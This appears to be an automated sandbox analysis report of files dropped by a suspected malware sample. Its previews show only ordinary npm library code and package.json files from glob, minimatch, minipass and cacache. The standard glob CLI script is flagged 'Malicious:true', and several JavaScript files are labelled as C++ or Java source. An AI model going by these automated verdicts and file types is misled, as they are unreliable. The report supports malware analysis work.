              Preview:The ISC License..Copyright (c) 2009-2023 Isaac Z. Schlueter and Contributors..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):48
              Entropy (8bit):4.204448698502606
              Encrypted:false
              SSDEEP:
              MD5:67B00CD4628BA13D476C9A28392F92CD
              SHA1:5E8037A935790E47108508E4A6B28E1B923C6B75
              SHA-256:AEDDAE5DF69FB914134CBB5ED9F9EAB61A5D426E882BA44601C43FA56426C822
              SHA-512:C912DC15E74A639B67300313EB2B83AB6EFBA4FBE126CB940DC8020FD0B935F0EEB3CCAFEF8B0C562305BCA72E58AE9F00F664FBD392DED8602DA697AE0A877B
              Malicious:false
              Reputation:unknown
              Preview:{. "version": "10.3.3",. "type": "commonjs".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, ASCII text executable
              Category:dropped
              Size (bytes):9586
              Entropy (8bit):4.2480624018037085
              Encrypted:false
              SSDEEP:
              MD5:DBADEB25D275E3E62A8199697BD7533E
              SHA1:BC3C31DDB0BD6ABA6B24D801246EB6DA21361D37
              SHA-256:BD99546F2CAE4F4AE064758051A130844BE7B2B5A141F42BE3C91035C07D5553
              SHA-512:9EF04BF690E2CB013B34A45F49A139C9F40AE148F5FA4A40CE76EB207310428203BFC54AFF3D2D7ECE0F186312F8CB9135BAD7E49E1EFE397F45806C54444552
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env node."use strict";.Object.defineProperty(exports, "__esModule", { value: true });.const foreground_child_1 = require("foreground-child");.const fs_1 = require("fs");.const jackspeak_1 = require("jackspeak");.const package_json_1 = require("../package.json");.const index_js_1 = require("./index.js");.const j = (0, jackspeak_1.jack)({. usage: 'glob [options] [<pattern> [<pattern> ...]]',.}). .description(`. Glob v${package_json_1.version}.. Expand the positional glob expression arguments into any matching file. system paths found.. `). .opt({. cmd: {. short: 'c',. hint: 'command',. description: `Run the command provided, passing the glob expression. matches as arguments.`,. },.}). .opt({. default: {. short: 'p',. hint: 'pattern',. description: `If no positional arguments are provided, glob will use. this pattern`,. },.}). .flag({. all: {. short: 'A
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):8058
              Entropy (8bit):4.409654115972912
              Encrypted:false
              SSDEEP:
              MD5:05FCDA1DEF3D49B6B07E969C57454588
              SHA1:E6A1E6C2FFA3C5333C062C545A082DD13FA2694C
              SHA-256:97E7D7BB50AA97FA472EA94B1B094461D2D275AA39E2D75B2A7B52B1B783BFA6
              SHA-512:95F1C18D192CA314F3A36A756147FA98360CD055101A2B0F447AC90BEE50DD5635535EC50259176AD1401E8AA928FD98FA8B4BEF5AC26973D484B5367DE4597E
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.Glob = void 0;.const minimatch_1 = require("minimatch");.const path_scurry_1 = require("path-scurry");.const url_1 = require("url");.const pattern_js_1 = require("./pattern.js");.const walker_js_1 = require("./walker.js");.// if no process global, just call it linux..// so we default to case-sensitive, / separators.const defaultPlatform = typeof process === 'object' &&. process &&. typeof process.platform === 'string'. ? process.platform. : 'linux';./**. * An object that can perform glob pattern traversals.. */.class Glob {. absolute;. cwd;. root;. dot;. dotRelative;. follow;. ignore;. magicalBraces;. mark;. matchBase;. maxDepth;. nobrace;. nocase;. nodir;. noext;. noglobstar;. pattern;. platform;. realpath;. scurry;. stat;. signal;. windowsPathsNoEscape;. withFileTypes;. /**. * The options provided to the constr
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):3791
              Entropy (8bit):4.261054500213067
              Encrypted:false
              SSDEEP:
              MD5:8654AB79A79E6F0B8E309447A04D7ECB
              SHA1:2F3FD42960DEDD5BB1174B2CA9C41739D4E87EE4
              SHA-256:48F406FAC9FC469112DBC0DDE3C256A42F4CA9600353C6788F343A68A8140AE3
              SHA-512:46FA591E5202DFE911951875600201FF1EC222B66FB81F78D12885EA13AF9404E01352EAF94D8CB1A27183EFDEA502CCD489553452A71764311D7873483762E9
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.// give it a pattern, and it'll be able to tell you if.// a given path should be ignored..// Ignoring a path ignores its children if the pattern ends in /**.// Ignores are always parsed in dot:true mode.Object.defineProperty(exports, "__esModule", { value: true });.exports.Ignore = void 0;.const minimatch_1 = require("minimatch");.const pattern_js_1 = require("./pattern.js");.const defaultPlatform = typeof process === 'object' &&. process &&. typeof process.platform === 'string'. ? process.platform. : 'linux';./**. * Class used to process ignored patterns. */.class Ignore {. relative;. relativeChildren;. absolute;. absoluteChildren;. constructor(ignored, { nobrace, nocase, noext, noglobstar, platform = defaultPlatform, }) {. this.relative = [];. this.absolute = [];. this.relativeChildren = [];. this.absoluteChildren = [];. const mmopts = {. dot: true,. nobrace,. nocase,.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):7298
              Entropy (8bit):4.30985439516901
              Encrypted:false
              SSDEEP:
              MD5:C67DEB4520A0E3930A9BC845DBC2B4C2
              SHA1:2528C273864F2F7BC1CE757344E5AA889D162876
              SHA-256:CFFF55CCF92058AADC067D904F17E78ECBFD749392BE12B2C17F8DA6B61BDAEC
              SHA-512:BC0E62ABF578849E8B9B07773B5EFCE024026B7530DB41F2E3914C88A84DD4EF143F328D1A9770885B509C19AE4C3E69A159D1D434D111728431EAE518F1886D
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.// this is just a very light wrapper around 2 arrays with an offset index.Object.defineProperty(exports, "__esModule", { value: true });.exports.Pattern = void 0;.const minimatch_1 = require("minimatch");.const isPatternList = (pl) => pl.length >= 1;.const isGlobList = (gl) => gl.length >= 1;./**. * An immutable-ish view on an array of glob parts and their parsed. * results. */.class Pattern {. #patternList;. #globList;. #index;. length;. #platform;. #rest;. #globString;. #isDrive;. #isUNC;. #isAbsolute;. #followGlobstar = true;. constructor(patternList, globList, index, platform) {. if (!isPatternList(patternList)) {. throw new TypeError('empty pattern list');. }. if (!isGlobList(globList)) {. throw new TypeError('empty glob list');. }. if (globList.length !== patternList.length) {. throw new TypeError('mismatched pattern list and glob list lengths');. }.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):10993
              Entropy (8bit):4.049773574068586
              Encrypted:false
              SSDEEP:
              MD5:28D58699E90251ED9031AD47BD942D2C
              SHA1:713E4CB40C1E86E6E4A62DA80E1A11B17F104441
              SHA-256:4B3AA2784C45125AA2A0484128809F90B99181D7F87160B9A3FE3BAD66D009A8
              SHA-512:CB135F1C646AB0F344112EE17FB0C71CBA5846E0BC3384DF3952EA88AB6EF68FC60D9DB210C639F0E26748ADF754CF26DDB4AFC6B38DEFF33789B34D714982FB
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.// synchronous utility for filtering entries and calculating subwalks.Object.defineProperty(exports, "__esModule", { value: true });.exports.Processor = exports.SubWalks = exports.MatchRecord = exports.HasWalkedCache = void 0;.const minimatch_1 = require("minimatch");./**. * A cache of which patterns have been processed for a given Path. */.class HasWalkedCache {. store;. constructor(store = new Map()) {. this.store = store;. }. copy() {. return new HasWalkedCache(new Map(this.store));. }. hasWalked(target, pattern) {. return this.store.get(target.fullpath())?.has(pattern.globString());. }. storeWalked(target, pattern) {. const fullpath = target.fullpath();. const cached = this.store.get(fullpath);. if (cached). cached.add(pattern.globString());. else. this.store.set(fullpath, new Set([pattern.globString()]));. }.}.exports.HasWalkedCache = HasWalkedCache;./**. * A record of w
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):7861
              Entropy (8bit):4.354114901811789
              Encrypted:false
              SSDEEP:
              MD5:02E2B9CE1CB06A02335AB4E8329A34D8
              SHA1:1705DF8B46611D093CEB487A308617E5446FBD23
              SHA-256:44AFC6BB2F7249E3FF580C839730550E72CF9173FC33E6E19B952AF6B034D845
              SHA-512:8EAFD83F14CB486DD33294F88BAF1D37776CD6DC93A267E8349103FDCFEF7EB4DD3EBAE2A54660B6980D050D5DBDCB2952565955D7FEF34AC5C0C3298A8DAE1A
              Malicious:false
              Reputation:unknown
              Preview:import { Minimatch } from 'minimatch';.import { PathScurry, PathScurryDarwin, PathScurryPosix, PathScurryWin32, } from 'path-scurry';.import { fileURLToPath } from 'url';.import { Pattern } from './pattern.js';.import { GlobStream, GlobWalker } from './walker.js';.// if no process global, just call it linux..// so we default to case-sensitive, / separators.const defaultPlatform = typeof process === 'object' &&. process &&. typeof process.platform === 'string'. ? process.platform. : 'linux';./**. * An object that can perform glob pattern traversals.. */.export class Glob {. absolute;. cwd;. root;. dot;. dotRelative;. follow;. ignore;. magicalBraces;. mark;. matchBase;. maxDepth;. nobrace;. nocase;. nodir;. noext;. noglobstar;. pattern;. platform;. realpath;. scurry;. stat;. signal;. windowsPathsNoEscape;. withFileTypes;. /**. * The options provided to the constructor.. */. opts;. /**.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):3625
              Entropy (8bit):4.178570526435931
              Encrypted:false
              SSDEEP:
              MD5:98BCAFF27A7290C71BCE2ACCF4D4455D
              SHA1:5AB9BEFC6C13D681E4ED1168D81C3C876395BE8A
              SHA-256:3FFFC55107D7AD5C8CC7AD0330DD91E6288D0F5830713E4A12B0AA195E810CCA
              SHA-512:D601C48AB2CAD310031564B17989868069BF699742F75E1C7030EFB9075CEA42C2EC70E3F315C7E7A0BF903F2B79F71A8678E381A0C09D8DB9E4B5B4E4EB4C27
              Malicious:false
              Reputation:unknown
              Preview:// give it a pattern, and it'll be able to tell you if.// a given path should be ignored..// Ignoring a path ignores its children if the pattern ends in /**.// Ignores are always parsed in dot:true mode.import { Minimatch } from 'minimatch';.import { Pattern } from './pattern.js';.const defaultPlatform = typeof process === 'object' &&. process &&. typeof process.platform === 'string'. ? process.platform. : 'linux';./**. * Class used to process ignored patterns. */.export class Ignore {. relative;. relativeChildren;. absolute;. absoluteChildren;. constructor(ignored, { nobrace, nocase, noext, noglobstar, platform = defaultPlatform, }) {. this.relative = [];. this.absolute = [];. this.relativeChildren = [];. this.absoluteChildren = [];. const mmopts = {. dot: true,. nobrace,. nocase,. noext,. noglobstar,. optimizationLevel: 2,. platform,. n
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):1652
              Entropy (8bit):4.741416456145412
              Encrypted:false
              SSDEEP:
              MD5:486AB8D51E13EC58DF0601C16C122BD6
              SHA1:C47244B95C0AD31B52D9906BBB573B381EB0DC54
              SHA-256:23CDF7D54725BF430C6BBA9F0A76267EAC6983DD2130129A5207AEF3A0A867F0
              SHA-512:F3FA35ED08409351C01BA7CCAA2CF0015541EF911EB1C1A0697BF54D117F14D015F603A7E2FECB44600832B0DD97C15E648C5069E0BD63F9F1FA88E172E48923
              Malicious:false
              Reputation:unknown
              Preview:import { escape, unescape } from 'minimatch';.import { Glob } from './glob.js';.import { hasMagic } from './has-magic.js';.export function globStreamSync(pattern, options = {}) {. return new Glob(pattern, options).streamSync();.}.export function globStream(pattern, options = {}) {. return new Glob(pattern, options).stream();.}.export function globSync(pattern, options = {}) {. return new Glob(pattern, options).walkSync();.}.async function glob_(pattern, options = {}) {. return new Glob(pattern, options).walk();.}.export function globIterateSync(pattern, options = {}) {. return new Glob(pattern, options).iterateSync();.}.export function globIterate(pattern, options = {}) {. return new Glob(pattern, options).iterate();.}.// aliases: glob.sync.stream() glob.stream.sync() glob.sync() etc.export const streamSync = globStreamSync;.export const stream = Object.assign(globStream, { sync: globStreamSync });.export const iterateSync = globIterateSync;.export const iterate = Obj
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):46
              Entropy (8bit):4.213460597220264
              Encrypted:false
              SSDEEP:
              MD5:BBB9FCF44E235BF98C7AF724278C3042
              SHA1:D8D9E7741EF6F5A4CA994E6FC3EC1F8874A4347D
              SHA-256:DA993EC3FBBA66966169A139E74DFF5A64A210C7B73BB361FB79FD5621B41A4C
              SHA-512:A3A3D8C715C70FAA369B5E1608B24459292C8AAA5CC4432BA2479A848E44EBFAB90936C9CEBAAF74BD8E7ABFB5F0A207FDABE938F32DF9ACDAE92A331DB52387
              Malicious:false
              Reputation:unknown
              Preview:{. "version": "10.3.3",. "type": "module".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):7159
              Entropy (8bit):4.279935454699546
              Encrypted:false
              SSDEEP:
              MD5:BD61679BB6DD76E3811143A2515CF06E
              SHA1:A4E03AFD59F552C24916F0D61AAE418E3F3F1746
              SHA-256:A1FAE8847D582A4C19C874FF8D93C40E8EFA4F33DA26F713824C59073F15D814
              SHA-512:D1FC37BFBE7752203974F01BA47B0AA9585EEB4BD35550AED59A33D4C99565073CD07FC566F3217F1AD349D332B376779D6FDECB0FC64B9ADC611008ACB531B4
              Malicious:false
              Reputation:unknown
              Preview:// this is just a very light wrapper around 2 arrays with an offset index.import { GLOBSTAR } from 'minimatch';.const isPatternList = (pl) => pl.length >= 1;.const isGlobList = (gl) => gl.length >= 1;./**. * An immutable-ish view on an array of glob parts and their parsed. * results. */.export class Pattern {. #patternList;. #globList;. #index;. length;. #platform;. #rest;. #globString;. #isDrive;. #isUNC;. #isAbsolute;. #followGlobstar = true;. constructor(patternList, globList, index, platform) {. if (!isPatternList(patternList)) {. throw new TypeError('empty pattern list');. }. if (!isGlobList(globList)) {. throw new TypeError('empty glob list');. }. if (globList.length !== patternList.length) {. throw new TypeError('mismatched pattern list and glob list lengths');. }. this.length = patternList.length;. if (index < 0 || index >= this.length) {. thro
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):10686
              Entropy (8bit):3.9977348359000215
              Encrypted:false
              SSDEEP:
              MD5:62EC6B03C2949552475BC02295FC97EB
              SHA1:1D42B1B6F5EA05193F255FEDAB774019985E3952
              SHA-256:E01F31217591641A893D98DCFDE5BF3BBA620001951AABEDE85EE510FF4D2629
              SHA-512:96C186810ADC6B42239B84A211544B0964448860B30EE44457651E6B64FB09AE0878721848897CCBA797026F81A74377F324DF618FC83191C2EDF2DE92E14055
              Malicious:false
              Reputation:unknown
              Preview:// synchronous utility for filtering entries and calculating subwalks.import { GLOBSTAR } from 'minimatch';./**. * A cache of which patterns have been processed for a given Path. */.export class HasWalkedCache {. store;. constructor(store = new Map()) {. this.store = store;. }. copy() {. return new HasWalkedCache(new Map(this.store));. }. hasWalked(target, pattern) {. return this.store.get(target.fullpath())?.has(pattern.globString());. }. storeWalked(target, pattern) {. const fullpath = target.fullpath();. const cached = this.store.get(fullpath);. if (cached). cached.add(pattern.globString());. else. this.store.set(fullpath, new Set([pattern.globString()]));. }.}./**. * A record of which paths have been matched in a given walk step,. * and whether they only are considered a match if they are a directory,. * and whether their absolute or relative path should be returned.. */.export class M
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):11232
              Entropy (8bit):4.264564061323609
              Encrypted:false
              SSDEEP:
              MD5:337AE5029C379B097072B113BC800507
              SHA1:64396EFB17055153F3A6F6594B23E1CF5E403027
              SHA-256:6A89448D6061621EDC2070CD909A9E539FEB4F1223372C83A3ADC2F2CC4FF25A
              SHA-512:EB6751BB5698C514802E208EEE2CB1EEC89A356FFFEC3AD8036EAA30A0939B8E994D01BD3D1608E63D0A875218E7C7366D3285ED0C1E691BA433A134A8E967E7
              Malicious:false
              Reputation:unknown
              Preview:/**. * Single-use utility classes to provide functionality to the {@link Glob}. * methods.. *. * @module. */.import { Minipass } from 'minipass';.import { Ignore } from './ignore.js';.import { Processor } from './processor.js';.const makeIgnore = (ignore, opts) => typeof ignore === 'string'. ? new Ignore([ignore], opts). : Array.isArray(ignore). ? new Ignore(ignore, opts). : ignore;./**. * basic walking utilities that all the glob walker types use. */.export class GlobUtil {. path;. patterns;. opts;. seen = new Set();. paused = false;. aborted = false;. #onResume = [];. #ignore;. #sep;. signal;. maxDepth;. constructor(patterns, path, opts) {. this.patterns = patterns;. this.path = path;. this.opts = opts;. this.#sep = !opts.posix && opts.platform === 'win32' ? '\\' : '/';. if (opts.ignore) {. this.#ignore = makeIgnore(opts.ignore, opts);. }. // ignore, always set with max
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2632
              Entropy (8bit):4.727120361754047
              Encrypted:false
              SSDEEP:
              MD5:09B1DDAAA47B56A817B6DDE9097DE486
              SHA1:47918357F21F963E2C62DDC266BBF809546385C7
              SHA-256:87E46961B3F2B995DA6A21E5AAFBF942F04ABA7BA6F9A43F6B4604D1F0B70534
              SHA-512:8215EE22254AFBE32AC81B928B3D8DC98CBA408B4B3823EA12BBD54F96A0A8DBF85F9160A969F30DB8921AB6D2FED07290B56519B14092071990AD9AA71F2CD8
              Malicious:false
              Reputation:unknown
              Preview:{. "author": "Isaac Z. Schlueter <i@izs.me> (https://blog.izs.me/)",. "name": "glob",. "description": "the most correct and second fastest glob implementation in JavaScript",. "version": "10.3.3",. "bin": "./dist/cjs/src/bin.js",. "repository": {. "type": "git",. "url": "git://github.com/isaacs/node-glob.git". },. "main": "./dist/cjs/src/index.js",. "module": "./dist/mjs/index.js",. "types": "./dist/mjs/index.d.ts",. "exports": {. ".": {. "import": {. "types": "./dist/mjs/index.d.ts",. "default": "./dist/mjs/index.js". },. "require": {. "types": "./dist/cjs/src/index.d.ts",. "default": "./dist/cjs/src/index.js". }. }. },. "files": [. "dist". ],. "scripts": {. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags",. "preprepare": "rm -rf dist",. "prepare": "tsc -p tsconfig.json && tsc -p tsconfig-esm.json && bash fixup.sh",. "pretest": "npm
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):492
              Entropy (8bit):5.0223029468580895
              Encrypted:false
              SSDEEP:
              MD5:CDB3CBB7CC55A4D1AA0622FF2825F611
              SHA1:EAD2677C30AC582E2B7AABBA39C4513793652E72
              SHA-256:FCD3B0E6EFEE67B11249804CC64BF4D22C883395491F79BFB484869D61823600
              SHA-512:6BC45CD6460107AA667CEC170E5318E43B91C2E0D85C9A16250FB1CB85EC41420A843F55A3CABDF460F1E7B8193488287B1E980641A7896168A1CECC006B9F4A
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.assertValidPattern = void 0;.const MAX_PATTERN_LENGTH = 1024 * 64;.const assertValidPattern = (pattern) => {. if (typeof pattern !== 'string') {. throw new TypeError('invalid pattern');. }. if (pattern.length > MAX_PATTERN_LENGTH) {. throw new TypeError('pattern is too long');. }.};.exports.assertValidPattern = assertValidPattern;.//# sourceMappingURL=assert-valid-pattern.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):22766
              Entropy (8bit):4.149971056868575
              Encrypted:false
              SSDEEP:
              MD5:AD2C4EC27C2D38825AED2C0E98A9A05A
              SHA1:89B3B326978675E01718B6BF9EA52DE3D4146455
              SHA-256:1C9BD2D6A8F0CFD1EE2649D522B50FE07D36508E7C96061D095E04B3EA198DC2
              SHA-512:953C588EB483B0A34A2A956F812864698B5382B4DA1B7AD4F49A04D7FC7805CB153F36D47E1EC120D07A5C5B7DEA17AACEAE6E6A5D575FBE6B0D02D4ED9E1575
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.// parse a single path portion.Object.defineProperty(exports, "__esModule", { value: true });.exports.AST = void 0;.const brace_expressions_js_1 = require("./brace-expressions.js");.const unescape_js_1 = require("./unescape.js");.const types = new Set(['!', '?', '+', '*', '@']);.const isExtglobType = (c) => types.has(c);.// Patterns that get prepended to bind to the start of either the.// entire string, or just a single path portion, to prevent dots.// and/or traversal patterns, when needed..// Exts don't need the ^ or / bit, because the root binds that already..const startNoTraversal = '(?!(?:^|/)\\.\\.?(?:$|/))';.const startNoDot = '(?!\\.)';.// characters that indicate a start of pattern needs the "no dots" bit,.// because a dot *might* be matched. ( is not in the list, because in.// the case of a child extglob, it will handle the prevention itself..const addPatternStart = new Set(['[', '.']);.// cases where traversal is A-OK, no dot prevention needed.const justDots =
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5763
              Entropy (8bit):4.48429510423379
              Encrypted:false
              SSDEEP:
              MD5:718FAD7BCAE1BEFC693664B0E6311049
              SHA1:F8A0A71BC080FF451F2893EA42CE8C1AA20EA30B
              SHA-256:9AF1C8892ED1E6A153D2F158438722C666AA906EB7E2EC8A27FCE7CF035B4278
              SHA-512:06BBB955BAD3712DE2D07D9388FC38916F27D534E3B6FCCADF396F445C46D1742F585C0987D25F368FED39AA3E7794F21AF24EB6CB0DB9B3C70DE9B9A331FB71
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.// translate the various posix character classes into unicode properties.// this works across all unicode locales.Object.defineProperty(exports, "__esModule", { value: true });.exports.parseClass = void 0;.// { <posix class>: [<translation>, /u flag required, negated].const posixClasses = {. '[:alnum:]': ['\\p{L}\\p{Nl}\\p{Nd}', true],. '[:alpha:]': ['\\p{L}\\p{Nl}', true],. '[:ascii:]': ['\\x' + '00-\\x' + '7f', false],. '[:blank:]': ['\\p{Zs}\\t', true],. '[:cntrl:]': ['\\p{Cc}', true],. '[:digit:]': ['\\p{Nd}', true],. '[:graph:]': ['\\p{Z}\\p{C}', true, true],. '[:lower:]': ['\\p{Ll}', true],. '[:print:]': ['\\p{C}', true],. '[:punct:]': ['\\p{P}', true],. '[:space:]': ['\\p{Z}\\t\\r\\n\\v\\f', true],. '[:upper:]': ['\\p{Lu}', true],. '[:word:]': ['\\p{L}\\p{Nl}\\p{Nd}\\p{Pc}', true],. '[:xdigit:]': ['A-Fa-f0-9', false],.};.// only need to escape a few things inside of brace expressions.// escapes: [ \ ] -.const braceEscape =
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):25
              Entropy (8bit):3.783465189601646
              Encrypted:false
              SSDEEP:
              MD5:DF9FFC6AA3F78A5491736D441C4258A8
              SHA1:9D0D83AE5D399D96B36D228E614A575FC209D488
              SHA-256:8005A3491DB7D92F36AC66369861589F9C47123D3A7C71E643FC2C06168CD45A
              SHA-512:6C58939DA58F9B716293A8328F7A3649B6E242BF235FAE00055A0CC79FB2788E4A99DFAA422E0CFADBE84E0D5E33B836F68627E6A409654877EDC443B94D04C4
              Malicious:false
              Reputation:unknown
              Preview:{. "type": "commonjs".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):23
              Entropy (8bit):3.675310868912364
              Encrypted:false
              SSDEEP:
              MD5:D0707362E90F00EDD12435E9D3B9D71C
              SHA1:50FAEB965B15DFC6854CB1235B06DBB5E79148D2
              SHA-256:3CA9D4AFD21425087CF31893B8F9F63C81B0B8408DB5E343CA76E5F8AA26AB9A
              SHA-512:9D323420CC63C6BEE79DCC5DB5F0F18F6B8E073DAAF8FFA5459E11F2DE59A9F5E8C178D77FA92AFC9DDD352623DEC362C62FFF859C71A2FAB93F1E2172C4987F
              Malicious:false
              Reputation:unknown
              Preview:{. "type": "module".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2106
              Entropy (8bit):4.662653488333719
              Encrypted:false
              SSDEEP:
              MD5:F455D9D12D45CEDADF012DABA6FBC9DF
              SHA1:4ED914356DB62C0F41AADDCB94DAC3EF6ECCD7BF
              SHA-256:09D6C2FA68DCF9D2E185D5F77E3064047DC4D10BB3B52581D89127DB38AD833F
              SHA-512:EC13E34ED45D1B51755BBBEB1DBE8DFFAE49775979F16C9F65398270016FE88C2A3A11FEC610B7E4491E2EDBBE564D9935C4792527DB6F627319D8CE9E255B4A
              Malicious:false
              Reputation:unknown
              Preview:{. "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me)",. "name": "minimatch",. "description": "a glob matcher in javascript",. "version": "9.0.3",. "repository": {. "type": "git",. "url": "git://github.com/isaacs/minimatch.git". },. "main": "./dist/cjs/index.js",. "module": "./dist/mjs/index.js",. "types": "./dist/cjs/index.d.ts",. "exports": {. ".": {. "import": {. "types": "./dist/mjs/index.d.ts",. "default": "./dist/mjs/index.js". },. "require": {. "types": "./dist/cjs/index.d.ts",. "default": "./dist/cjs/index.js". }. }. },. "files": [. "dist". ],. "scripts": {. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags",. "preprepare": "rm -rf dist",. "prepare": "tsc -p tsconfig.json && tsc -p tsconfig-esm.json",. "postprepare": "bash fixup.sh",. "pretest": "npm run prepare",. "presnap": "npm run prepare",. "test": "c8 t
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):33213
              Entropy (8bit):4.53092734492884
              Encrypted:false
              SSDEEP:
              MD5:84C42C978E6203068EF833B6E0E04D6D
              SHA1:0361112D2E6C513CFC279FF8672C4F4BCD0CEBED
              SHA-256:AEC793D069ED40C29C283EA4C377B267080E15C1B8481BE5DA692106D647F23F
              SHA-512:BCADE19D63D4E5ACF64C7D1CCDD78F2080590835810DC6D4F92980739DD8AE7AF14D5C42A50F69F2FE43BD6744A4C4D9F0979C3D6137872FA5DE518F85E2246D
              Malicious:false
              Reputation:unknown
              Preview:const proc = typeof process === 'object' && process. ? process. : {. stdout: null,. stderr: null,. };.import { EventEmitter } from 'events';.import Stream from 'stream';.import { StringDecoder } from 'string_decoder';./**. * Return true if the argument is a Minipass stream, Node stream, or something. * else that Minipass can interact with.. */.export const isStream = (s) => !!s &&. typeof s === 'object' &&. (s instanceof Minipass ||. s instanceof Stream ||. isReadable(s) ||. isWritable(s));./**. * Return true if the argument is a valid {@link Minipass.Readable}. */.export const isReadable = (s) => !!s &&. typeof s === 'object' &&. s instanceof EventEmitter &&. typeof s.pipe === 'function' &&. // node core Writable streams have a pipe() method, but it throws. s.pipe !== Stream.Writable.prototype.pipe;./**. * Return true if the argument is a valid {@link Minipass.Writable}. */.export const isWritable = (s) => !!s &&. typ
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):17
              Entropy (8bit):3.4992275471326932
              Encrypted:false
              SSDEEP:
              MD5:6138DA8F9BD4F861C6157689D96B6D64
              SHA1:EE2833A41C28830D75B2F3327075286C915ED0DD
              SHA-256:6DC1B06D6B093E9CCCB20BEE06A93836EEE0420AE26803CA2CE4065D82F070D1
              SHA-512:0A3F1CB1522C6E7595186A9A54ED073FFA590B26C7D31B0877F19C925F847037E9F972066BFED62609B190EB2BC21FF7B31514E08C3DE64780FEF5982CBB21F2
              Malicious:false
              Reputation:unknown
              Preview:{"type":"module"}
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1972
              Entropy (8bit):4.668164769806852
              Encrypted:false
              SSDEEP:
              MD5:021DA99D64C1D7568D8DC0A1B0C17886
              SHA1:255C3F528884DE0B048CC1CBB1002C2CB72FA47B
              SHA-256:45D571F7796EF887DEFF18034FC8594E637BE453B26DF04CBA5933303D9ED7E0
              SHA-512:90F7D45ED2AE9779A6B5A1FE9C40EEA4A30FB915DD70B5B66CFCA836926616F012E5E5AFD9CA8FFC0357974ACA57033B8348669118A367D3DFD7DF38E32441A2
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "cacache",. "version": "17.1.4",. "cache-version": {. "content": "2",. "index": "5". },. "description": "Fast, fault-tolerant, cross-platform, disk-based, data-agnostic, content-addressable cache.",. "main": "lib/index.js",. "files": [. "bin/",. "lib/". ],. "scripts": {. "test": "tap",. "snap": "tap",. "coverage": "tap",. "test-docker": "docker run -it --rm --name pacotest -v \"$PWD\":/tmp -w /tmp node:latest npm test",. "lint": "eslint \"**/*.js\"",. "npmclilint": "npmcli-lint",. "lintfix": "npm run lint -- --fix",. "postsnap": "npm run lintfix --",. "postlint": "template-oss-check",. "posttest": "npm run lint",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/cacache.git". },. "keywords": [. "cache",. "caching",. "content-addressable",. "sri",. "sri hash",. "subresource integrity",. "cache",. "storage",. "store",
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
